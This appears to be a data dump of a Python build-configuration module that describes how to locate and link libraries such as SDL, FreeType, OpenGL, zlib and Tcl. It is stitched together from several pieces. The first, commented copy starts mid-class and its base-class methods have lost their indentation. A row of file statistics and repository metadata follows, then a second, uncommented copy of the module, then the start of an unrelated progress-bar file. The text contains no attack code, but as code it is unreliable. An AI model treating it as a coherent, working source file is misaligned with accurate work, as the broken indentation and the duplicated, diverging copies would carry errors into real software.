	# Config script option that prints the static link flags, or None if
	# the script cannot produce them (getLinkFlags() then falls back to
	# constructing generic link flags).
	staticLibsOption = None
	# NOTE(review): not referenced in this class; presumably the name of a
	# function used to probe for the library's presence — confirm.
	function = None
	# TODO: A library can give an application compile time and run time
	#       dependencies on other libraries. For example SDL_ttf depends on
	#       FreeType only at run time, but depends on SDL both compile time
	#       and run time, since SDL is part of its interface and FreeType is
	#       only used by the implementation. As a result, it is possible to
	#       compile against SDL_ttf without having the FreeType headers
	#       installed. But our getCompileFlags() does not support this.
	#       In pkg-config these are called private dependencies.
	# Names (keys into librariesByName) of the libraries this one depends
	# on, both at compile time and at link time.
	dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform): # pylint: disable-msg=W0613
'''Returns True iff this library is a system library on the given
platform.
A system library is a library that is available systemwide in the
minimal installation of the OS.
The default implementation returns False.
'''
return False
@classmethod
def getConfigScript( # pylint: disable-msg=W0613
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
# TODO: A generic mechanism for locating config scripts in SDKs.
# Note that distroRoot is for non-system libs only.
# Trying a path relative to the compiler location would
# probably work well.
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform): # pylint: disable-msg=W0613
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform): # pylint: disable-msg=W0613
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
'''Returns the version of this library, "unknown" if there is no
mechanism to retrieve the version, None if there is a mechanism
to retrieve the version but it failed, or a callable that takes a
CompileCommand and a log stream as its arguments and returns the
version or None if retrieval failed.
'''
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
	'''FreeType 2 font rendering engine.'''
	libName = 'freetype'
	makeName = 'FREETYPE'
	header = ('<ft2build.h>', 'FT_FREETYPE_H')
	configScriptName = 'freetype-config'
	function = 'FT_Open_Face'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'

	@classmethod
	def getConfigScript(cls, platform, linkStatic, distroRoot):
		# On NetBSD/OpenBSD FreeType lives in the X11 tree rather than
		# the ports tree, so redirect the default root there.
		if platform in ('netbsd', 'openbsd') and distroRoot == '/usr/local':
			distroRoot = '/usr/X11R6'
		return super(FreeType, cls).getConfigScript(
			platform, linkStatic, distroRoot
			)

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		# freetype-config reports its version via --ftversion instead of
		# the usual --version option.
		script = cls.getConfigScript(platform, linkStatic, distroRoot)
		return '`%s --ftversion`' % script
class GL(Library):
	'''OpenGL; located and linked in a platform-specific way.'''
	libName = 'GL'
	makeName = 'GL'
	function = 'glGenTextures'
	# "header" stays None; getHeaders() below supplies the
	# platform-specific header instead.

	@classmethod
	def isSystemLibrary(cls, platform):
		# On *BSD, OpenGL is in ports, not in the base system.
		return not platform.endswith('bsd')

	@classmethod
	def getHeaders(cls, platform):
		# Mac OS X uses a framework-style header location.
		if platform == 'darwin':
			return ('<OpenGL/gl.h>', )
		else:
			return ('<GL/gl.h>', )

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		if platform in ('netbsd', 'openbsd'):
			# Headers live in the X11 tree on these platforms.
			return '-I/usr/X11R6/include -I/usr/X11R7/include'
		else:
			return super(GL, cls).getCompileFlags(
				platform, linkStatic, distroRoot
				)

	@classmethod
	def getLinkFlags(cls, platform, linkStatic, distroRoot):
		if platform == 'darwin':
			return '-framework OpenGL'
		elif platform.startswith('mingw'):
			return '-lopengl32'
		elif platform in ('netbsd', 'openbsd'):
			return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
		else:
			return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		# There is no config script; instead expand the GL_VERSION_x_y
		# feature macros from the header and report the highest pair for
		# which a macro is defined.
		def execute(cmd, log):
			versionPairs = tuple(
				( major, minor )
				for major in range(1, 10)
				for minor in range(0, 10)
				)
			version = cmd.expand(log, cls.getHeaders(platform), *(
				'GL_VERSION_%d_%d' % pair for pair in versionPairs
				))
			try:
				return '%d.%d' % max(
					ver
					for ver, exp in zip(versionPairs, version)
					if exp is not None
					)
			except ValueError:
				# No GL_VERSION_x_y macro was defined at all.
				return None
		return execute
class GLEW(Library):
	'''The OpenGL Extension Wrangler.'''
	makeName = 'GLEW'
	header = '<GL/glew.h>'
	function = 'glewInit'
	dependsOn = ('GL', )

	@classmethod
	def getLibName(cls, platform):
		# MinGW ships the library under the name glew32.
		return 'glew32' if platform.startswith('mingw') else 'GLEW'

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		flags = super(GLEW, cls).getCompileFlags(
			platform, linkStatic, distroRoot
			)
		if linkStatic and platform.startswith('mingw'):
			# Static GLEW on MinGW requires this define for correct linkage.
			flags += ' -DGLEW_STATIC'
		return flags
class LibPNG(Library):
	'''Portable Network Graphics reference library (libpng 1.2 branch).'''
	libName = 'png12'
	makeName = 'PNG'
	header = '<png.h>'
	configScriptName = 'libpng-config'
	# libpng-config uses --ldflags rather than the usual --libs.
	dynamicLibsOption = '--ldflags'
	function = 'png_write_image'
	dependsOn = ('ZLIB', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class LibXML2(Library):
	'''libxml2 XML parser library.'''
	libName = 'xml2'
	makeName = 'XML'
	header = '<libxml/parser.h>'
	configScriptName = 'xml2-config'
	function = 'xmlParseDocument'
	dependsOn = ('ZLIB', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android'

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		flags = super(LibXML2, cls).getCompileFlags(
			platform, linkStatic, distroRoot
			)
		if linkStatic and not cls.isSystemLibrary(platform):
			# The headers need this define to select static linkage.
			flags += ' -DLIBXML_STATIC'
		return flags
class OGG(Library):
	'''Ogg bitstream library (libogg).'''
	libName = 'ogg'
	makeName = 'OGG'
	header = '<ogg/ogg.h>'
	function = 'ogg_stream_init'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class SDL(Library):
	'''Simple DirectMedia Layer.'''
	libName = 'SDL'
	makeName = 'SDL'
	header = '<SDL.h>'
	configScriptName = 'sdl-config'
	# sdl-config can produce static link flags as well.
	staticLibsOption = '--static-libs'
	function = 'SDL_Init'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class SDL_ttf(Library):
	'''TrueType font rendering on top of SDL.'''
	libName = 'SDL_ttf'
	makeName = 'SDL_TTF'
	header = '<SDL_ttf.h>'
	function = 'TTF_OpenFont'
	dependsOn = ('SDL', 'FREETYPE')

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		# No config script; expand the version macros from the header.
		def execute(cmd, log):
			macros = (
				'SDL_TTF_MAJOR_VERSION',
				'SDL_TTF_MINOR_VERSION',
				'SDL_TTF_PATCHLEVEL',
				)
			version = cmd.expand(log, cls.getHeaders(platform), *macros)
			if None in version:
				return None
			return '%s.%s.%s' % version
		return execute
class TCL(Library):
	'''Tcl scripting language library.

	Tcl does not ship a normal lib-config script; all information comes
	from sourcing tclConfig.sh (see getTclConfig / evalTclConfigExpr).
	'''
	libName = 'tcl'
	makeName = 'TCL'
	header = '<tcl.h>'
	function = 'Tcl_CreateInterp'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform in ('android',)

	@classmethod
	def getTclConfig(cls, platform, distroRoot):
		'''Tcl has a config script that is unlike the typical lib-config script.
		Information is gathered by sourcing the config script, instead of
		executing it and capturing the queried value from stdout. This script
		is located in a library directory, not in a directory in the PATH.
		Also, it does not have the executable bit set.
		This method returns the location of the Tcl config script, or None if
		it could not be found.
		'''
		if hasattr(cls, 'tclConfig'):
			# Return cached value.
			return cls.tclConfig
		def iterLocations():
			# Yield candidate directories that may contain tclConfig.sh.
			if platform == 'android':
				# Under Android, the tcl set-up apparently differs from
				# other cross-platform setups. the search algorithm to find the
				# directory that will contain the tclConfig.sh script and the shared libs
				# is not applicable to Android. Instead, immediately return the correct
				# subdirectories to the routine that invokes iterLocations()
				sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
				libpath = sdl_android_port_path + '/project/libs/armeabi'
				yield libpath
				tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
				yield tclpath
			else:
				if distroRoot is None or cls.isSystemLibrary(platform):
					roots = ('/usr/local', '/usr')
				else:
					roots = (distroRoot, )
				for root in roots:
					if isdir(root):
						for libdir in ('lib', 'lib64', 'lib/tcl'):
							libpath = root + '/' + libdir
							if isdir(libpath):
								yield libpath
								# Also descend into versioned tcl8.x
								# subdirectories of the lib dir.
								for entry in listdir(libpath):
									if entry.startswith('tcl8.'):
										tclpath = libpath + '/' + entry
										if isdir(tclpath):
											yield tclpath
		tclConfigs = {}
		log = open('derived/tcl-search.log', 'w')
		print >> log, 'Looking for Tcl...'
		try:
			for location in iterLocations():
				path = location + '/tclConfig.sh'
				if isfile(path):
					print >> log, 'Config script:', path
					# Source the script and echo the version variables.
					text = captureStdout(
						log,
						"sh -c '. %s && echo %s'" % (
							path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
							)
						)
					if text is not None:
						try:
							# pylint: disable-msg=E1103
							major, minor = text.split()
							version = int(major), int(minor)
						except ValueError:
							# Output was not two integers; skip this script.
							pass
						else:
							print >> log, 'Found: version %d.%d' % version
							tclConfigs[path] = version
			try:
				# Minimum required version is 8.5.
				# Pick the oldest possible version to minimize the risk of
				# running into incompatible changes.
				tclConfig = min(
					( version, path )
					for path, version in tclConfigs.iteritems()
					if version >= (8, 5)
					)[1]
			except ValueError:
				# min() on an empty sequence: no suitable script found.
				tclConfig = None
				print >> log, 'No suitable versions found.'
			else:
				print >> log, 'Selected:', tclConfig
		finally:
			log.close()
		# Cache the result on the class for subsequent calls.
		cls.tclConfig = tclConfig
		return tclConfig

	@classmethod
	def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
		'''Source tclConfig.sh and echo the shell expansion of "expr".
		Returns the stripped output, or None if the config script was not
		found or produced no output.
		'''
		tclConfig = cls.getTclConfig(platform, distroRoot)
		if tclConfig is None:
			return None
		log = open('derived/tcl-search.log', 'a')
		try:
			print >> log, 'Getting Tcl %s...' % description
			text = captureStdout(
				log,
				shjoin([
					'sh', '-c',
					'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
					])
				)
			if text is not None:
				print >> log, 'Result: %s' % text.strip()
		finally:
			log.close()
		return None if text is None else text.strip()

	@classmethod
	def getCompileFlags(cls, platform, linkStatic, distroRoot):
		if platform == 'android':
			# Use the current ANDROID cross-compilation flags and not the TCL flags. Otherwise, the
			# wrong version of libstdc++ will end-up on the include path; the minimal Android NDK
			# version instead of the more complete GNU version. This is because TCL for Android has
			# been configured with the minimal libstdc++ on the include path in the C(XX) flags and
			# not with the more complete GNU version
			return environ['ANDROID_CXXFLAGS']
		wantShared = not linkStatic or cls.isSystemLibrary(platform)
		# The -DSTATIC_BUILD is a hack to avoid including the complete
		# TCL_DEFS but still being able to link on MinGW (tcl.h depends on
		# this being defined properly).
		return cls.evalTclConfigExpr(
			platform,
			distroRoot,
			'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
			'compile flags'
			)

	@classmethod
	def getLinkFlags(cls, platform, linkStatic, distroRoot):
		if platform == 'android':
			# Use the current ANDROID cross-compilation flags and not the TCL flags to
			# prevent issues with libstdc++ version. See also getCompileFlags()
			return environ['ANDROID_LDFLAGS']
		# Tcl can be built as a shared or as a static library, but not both.
		# Check whether the library type of Tcl matches the one we want.
		wantShared = not linkStatic or cls.isSystemLibrary(platform)
		tclShared = cls.evalTclConfigExpr(
			platform,
			distroRoot,
			'${TCL_SHARED_BUILD}',
			'library type (shared/static)'
			)
		log = open('derived/tcl-search.log', 'a')
		try:
			if tclShared == '0':
				if wantShared:
					print >> log, (
						'Dynamic linking requested, but Tcl installation has '
						'static library.'
						)
					return None
			elif tclShared == '1':
				if not wantShared:
					print >> log, (
						'Static linking requested, but Tcl installation has '
						'dynamic library.'
						)
					return None
			else:
				print >> log, (
					'Unable to determine whether Tcl installation has '
					'shared or static library.'
					)
				return None
		finally:
			log.close()
		# Now get the link flags.
		if wantShared:
			return cls.evalTclConfigExpr(
				platform,
				distroRoot,
				'${TCL_LIB_SPEC}',
				'dynamic link flags'
				)
		else:
			return cls.evalTclConfigExpr(
				platform,
				distroRoot,
				'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
				'static link flags'
				)

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		return cls.evalTclConfigExpr(
			platform,
			distroRoot,
			'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
			'version'
			)
class Theora(Library):
	'''Theora video decoder library (libtheoradec).'''
	libName = 'theoradec'
	makeName = 'THEORA'
	header = '<theora/theoradec.h>'
	function = 'th_decode_ycbcr_out'
	dependsOn = ('OGG', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class Vorbis(Library):
	'''Vorbis audio codec library.'''
	libName = 'vorbis'
	makeName = 'VORBIS'
	header = '<vorbis/codec.h>'
	function = 'vorbis_synthesis_pcmout'
	dependsOn = ('OGG', )

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'
class ZLib(Library):
	'''zlib compression library.'''
	libName = 'z'
	makeName = 'ZLIB'
	header = '<zlib.h>'
	function = 'inflate'

	@classmethod
	def isSystemLibrary(cls, platform):
		return platform == 'android' or platform == 'dingux'

	@classmethod
	def getVersion(cls, platform, linkStatic, distroRoot):
		# No config script; read the ZLIB_VERSION macro from the header.
		def execute(cmd, log):
			version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
			if version is None:
				return None
			# The macro expands to a quoted string literal.
			return version.strip('"')
		return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
	'''Yield (makeName, class) pairs for every Library subclass among the
	given objects; the abstract Library base class itself is skipped.
	'''
	for obj in localObjects:
		if isinstance(obj, type) and issubclass(obj, Library):
			if not (obj is Library):
				yield obj.makeName, obj
# dict.values() behaves identically here on Python 2 and 3, while the
# previously used itervalues() is Python-2-only and bought nothing since
# the dict is built eagerly anyway.
librariesByName = dict(_discoverLibraries(locals().values()))
def allDependencies(makeNames):
	'''Compute the set of all directly and indirectly required libraries to
	build and use the given set of libraries.
	Returns the make names of the required libraries.
	'''
	# Reflexive-transitive closure via breadth-first frontier expansion.
	closure = set()
	frontier = set(makeNames)
	while frontier:
		closure |= frontier
		nextFrontier = set()
		for makeName in frontier:
			for depMakeName in librariesByName[makeName].dependsOn:
				if depMakeName not in closure:
					nextFrontier.add(depMakeName)
		frontier = nextFrontier
	return closure
| 29.937605 | 92 | 0.694756 |
from executils import captureStdout, shjoin
from os import listdir
from os.path import isdir, isfile
from os import environ
class Library(object):
libName = None
makeName = None
header = None
configScriptName = None
dynamicLibsOption = '--libs'
staticLibsOption = None
function = None
dependsOn = ()
@classmethod
def isSystemLibrary(cls, platform):
return False
@classmethod
def getConfigScript(
cls, platform, linkStatic, distroRoot
):
scriptName = cls.configScriptName
if scriptName is None:
return None
elif platform == 'dingux' and cls.isSystemLibrary(platform):
return '/opt/a320-toolchain/usr/mipsel-a320-linux-uclibc/sysroot/usr/bin/%s' % scriptName
elif distroRoot is None:
return scriptName
else:
return '%s/bin/%s' % (distroRoot, scriptName)
@classmethod
def getHeaders(cls, platform):
header = cls.header
return header if hasattr(header, '__iter__') else (header, )
@classmethod
def getLibName(cls, platform):
return cls.libName
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
flags = [ '`%s --cflags`' % configScript ]
elif distroRoot is None or cls.isSystemLibrary(platform):
flags = []
else:
flags = [ '-I%s/include' % distroRoot ]
dependentFlags = [
librariesByName[name].getCompileFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
return ' '.join(flags + dependentFlags)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is not None:
libsOption = (
cls.dynamicLibsOption
if not linkStatic or cls.isSystemLibrary(platform)
else cls.staticLibsOption
)
if libsOption is not None:
return '`%s %s`' % (configScript, libsOption)
if distroRoot is None or cls.isSystemLibrary(platform):
return '-l%s' % cls.getLibName(platform)
else:
flags = [
'%s/lib/lib%s.a' % (distroRoot, cls.getLibName(platform))
] if linkStatic else [
'-L%s/lib -l%s' % (distroRoot, cls.getLibName(platform))
]
dependentFlags = [
librariesByName[name].getLinkFlags(
platform, linkStatic, distroRoot
)
for name in cls.dependsOn
]
systemDependentFlags = list(cls.getSystemDependentFlags(platform))
return ' '.join(flags + dependentFlags + systemDependentFlags)
@classmethod
def getSystemDependentFlags(cls, platform):
return ()
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
if configScript is None:
return 'unknown'
else:
return '`%s --version`' % configScript
class FreeType(Library):
libName = 'freetype'
makeName = 'FREETYPE'
header = ('<ft2build.h>', 'FT_FREETYPE_H')
configScriptName = 'freetype-config'
function = 'FT_Open_Face'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getConfigScript(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
if distroRoot == '/usr/local':
distroRoot = '/usr/X11R6'
return super(FreeType, cls).getConfigScript(
platform, linkStatic, distroRoot
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
configScript = cls.getConfigScript(platform, linkStatic, distroRoot)
return '`%s --ftversion`' % configScript
class GL(Library):
libName = 'GL'
makeName = 'GL'
function = 'glGenTextures'
@classmethod
def isSystemLibrary(cls, platform):
return not platform.endswith('bsd')
@classmethod
def getHeaders(cls, platform):
if platform == 'darwin':
return ('<OpenGL/gl.h>', )
else:
return ('<GL/gl.h>', )
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform in ('netbsd', 'openbsd'):
return '-I/usr/X11R6/include -I/usr/X11R7/include'
else:
return super(GL, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'darwin':
return '-framework OpenGL'
elif platform.startswith('mingw'):
return '-lopengl32'
elif platform in ('netbsd', 'openbsd'):
return '-L/usr/X11R6/lib -L/usr/X11R7/lib -lGL'
else:
return super(GL, cls).getLinkFlags(platform, linkStatic, distroRoot)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
versionPairs = tuple(
( major, minor )
for major in range(1, 10)
for minor in range(0, 10)
)
version = cmd.expand(log, cls.getHeaders(platform), *(
'GL_VERSION_%d_%d' % pair for pair in versionPairs
))
try:
return '%d.%d' % max(
ver
for ver, exp in zip(versionPairs, version)
if exp is not None
)
except ValueError:
return None
return execute
class GLEW(Library):
makeName = 'GLEW'
header = '<GL/glew.h>'
function = 'glewInit'
dependsOn = ('GL', )
@classmethod
def getLibName(cls, platform):
if platform.startswith('mingw'):
return 'glew32'
else:
return 'GLEW'
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(GLEW, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if platform.startswith('mingw') and linkStatic:
return '%s -DGLEW_STATIC' % flags
else:
return flags
class LibPNG(Library):
libName = 'png12'
makeName = 'PNG'
header = '<png.h>'
configScriptName = 'libpng-config'
dynamicLibsOption = '--ldflags'
function = 'png_write_image'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class LibXML2(Library):
libName = 'xml2'
makeName = 'XML'
header = '<libxml/parser.h>'
configScriptName = 'xml2-config'
function = 'xmlParseDocument'
dependsOn = ('ZLIB', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
flags = super(LibXML2, cls).getCompileFlags(
platform, linkStatic, distroRoot
)
if not linkStatic or cls.isSystemLibrary(platform):
return flags
else:
return flags + ' -DLIBXML_STATIC'
class OGG(Library):
libName = 'ogg'
makeName = 'OGG'
header = '<ogg/ogg.h>'
function = 'ogg_stream_init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL(Library):
libName = 'SDL'
makeName = 'SDL'
header = '<SDL.h>'
configScriptName = 'sdl-config'
staticLibsOption = '--static-libs'
function = 'SDL_Init'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class SDL_ttf(Library):
libName = 'SDL_ttf'
makeName = 'SDL_TTF'
header = '<SDL_ttf.h>'
function = 'TTF_OpenFont'
dependsOn = ('SDL', 'FREETYPE')
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform),
'SDL_TTF_MAJOR_VERSION',
'SDL_TTF_MINOR_VERSION',
'SDL_TTF_PATCHLEVEL',
)
return None if None in version else '%s.%s.%s' % version
return execute
class TCL(Library):
libName = 'tcl'
makeName = 'TCL'
header = '<tcl.h>'
function = 'Tcl_CreateInterp'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android',)
@classmethod
def getTclConfig(cls, platform, distroRoot):
if hasattr(cls, 'tclConfig'):
return cls.tclConfig
def iterLocations():
if platform == 'android':
sdl_android_port_path = environ['SDL_ANDROID_PORT_PATH']
libpath = sdl_android_port_path + '/project/libs/armeabi'
yield libpath
tclpath = sdl_android_port_path + '/project/jni/tcl8.5/unix'
yield tclpath
else:
if distroRoot is None or cls.isSystemLibrary(platform):
roots = ('/usr/local', '/usr')
else:
roots = (distroRoot, )
for root in roots:
if isdir(root):
for libdir in ('lib', 'lib64', 'lib/tcl'):
libpath = root + '/' + libdir
if isdir(libpath):
yield libpath
for entry in listdir(libpath):
if entry.startswith('tcl8.'):
tclpath = libpath + '/' + entry
if isdir(tclpath):
yield tclpath
tclConfigs = {}
log = open('derived/tcl-search.log', 'w')
print >> log, 'Looking for Tcl...'
try:
for location in iterLocations():
path = location + '/tclConfig.sh'
if isfile(path):
print >> log, 'Config script:', path
text = captureStdout(
log,
"sh -c '. %s && echo %s'" % (
path, '$TCL_MAJOR_VERSION $TCL_MINOR_VERSION'
)
)
if text is not None:
try:
major, minor = text.split()
version = int(major), int(minor)
except ValueError:
pass
else:
print >> log, 'Found: version %d.%d' % version
tclConfigs[path] = version
try:
tclConfig = min(
( version, path )
for path, version in tclConfigs.iteritems()
if version >= (8, 5)
)[1]
except ValueError:
tclConfig = None
print >> log, 'No suitable versions found.'
else:
print >> log, 'Selected:', tclConfig
finally:
log.close()
cls.tclConfig = tclConfig
return tclConfig
@classmethod
def evalTclConfigExpr(cls, platform, distroRoot, expr, description):
tclConfig = cls.getTclConfig(platform, distroRoot)
if tclConfig is None:
return None
log = open('derived/tcl-search.log', 'a')
try:
print >> log, 'Getting Tcl %s...' % description
text = captureStdout(
log,
shjoin([
'sh', '-c',
'. %s && eval "echo \\"%s\\""' % (tclConfig, expr)
])
)
if text is not None:
print >> log, 'Result: %s' % text.strip()
finally:
log.close()
return None if text is None else text.strip()
@classmethod
def getCompileFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_CXXFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_INCLUDE_SPEC}' + ('' if wantShared else ' -DSTATIC_BUILD'),
'compile flags'
)
@classmethod
def getLinkFlags(cls, platform, linkStatic, distroRoot):
if platform == 'android':
return environ['ANDROID_LDFLAGS']
wantShared = not linkStatic or cls.isSystemLibrary(platform)
tclShared = cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_SHARED_BUILD}',
'library type (shared/static)'
)
log = open('derived/tcl-search.log', 'a')
try:
if tclShared == '0':
if wantShared:
print >> log, (
'Dynamic linking requested, but Tcl installation has '
'static library.'
)
return None
elif tclShared == '1':
if not wantShared:
print >> log, (
'Static linking requested, but Tcl installation has '
'dynamic library.'
)
return None
else:
print >> log, (
'Unable to determine whether Tcl installation has '
'shared or static library.'
)
return None
finally:
log.close()
if wantShared:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_LIB_SPEC}',
'dynamic link flags'
)
else:
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_EXEC_PREFIX}/lib/${TCL_LIB_FILE} ${TCL_LIBS}',
'static link flags'
)
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
return cls.evalTclConfigExpr(
platform,
distroRoot,
'${TCL_MAJOR_VERSION}.${TCL_MINOR_VERSION}${TCL_PATCH_LEVEL}',
'version'
)
class Theora(Library):
libName = 'theoradec'
makeName = 'THEORA'
header = '<theora/theoradec.h>'
function = 'th_decode_ycbcr_out'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class Vorbis(Library):
libName = 'vorbis'
makeName = 'VORBIS'
header = '<vorbis/codec.h>'
function = 'vorbis_synthesis_pcmout'
dependsOn = ('OGG', )
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
class ZLib(Library):
libName = 'z'
makeName = 'ZLIB'
header = '<zlib.h>'
function = 'inflate'
@classmethod
def isSystemLibrary(cls, platform):
return platform in ('android', 'dingux')
@classmethod
def getVersion(cls, platform, linkStatic, distroRoot):
def execute(cmd, log):
version = cmd.expand(log, cls.getHeaders(platform), 'ZLIB_VERSION')
return None if version is None else version.strip('"')
return execute
# Build a dictionary of libraries using introspection.
def _discoverLibraries(localObjects):
for obj in localObjects:
if isinstance(obj, type) and issubclass(obj, Library):
if not (obj is Library):
yield obj.makeName, obj
librariesByName = dict(_discoverLibraries(locals().itervalues()))
def allDependencies(makeNames):
# Compute the reflexive-transitive closure.
transLibs = set()
newLibs = set(makeNames)
while newLibs:
transLibs.update(newLibs)
newLibs = set(
depMakeName
for makeName in newLibs
for depMakeName in librariesByName[makeName].dependsOn
if depMakeName not in transLibs
)
return transLibs
| true | true |
f72ec2738fdcaa32e93f95407b764fa52d3f3f71 | 598 | py | Python | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 2,177 | 2015-01-02T09:56:51.000Z | 2022-03-27T01:48:37.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 29 | 2015-01-24T17:38:59.000Z | 2021-08-29T03:39:30.000Z | lixian_progress.py | 1py/xunlei-lixian | 1881932b9d5ccba78c7788fbad12982e05bf7f86 | [
"MIT"
] | 516 | 2015-01-02T18:48:29.000Z | 2022-01-26T07:12:35.000Z |
import sys
class SimpleProgressBar:
	"""Minimal in-place console progress bar.

	update() redraws the bar on the current line using a carriage return;
	done() terminates the line once the bar has been shown.
	"""

	BAR_SIZE = 40  # bar width in characters

	def __init__(self):
		# Set by update(); lets done() know whether a newline is owed.
		self.displayed = False

	@staticmethod
	def _render(fraction):
		"""Return the rendered bar line for *fraction* in [0.0, 1.0].

		Values above 1.0 are clamped to a full bar.  The fractional part
		of the last cell is drawn as '=' (> 0.8), '-' (> 0.4) or nothing.
		"""
		percent = min(fraction * 100.0, 100.0)
		bar_size = SimpleProgressBar.BAR_SIZE
		dots = int(bar_size * percent / 100)
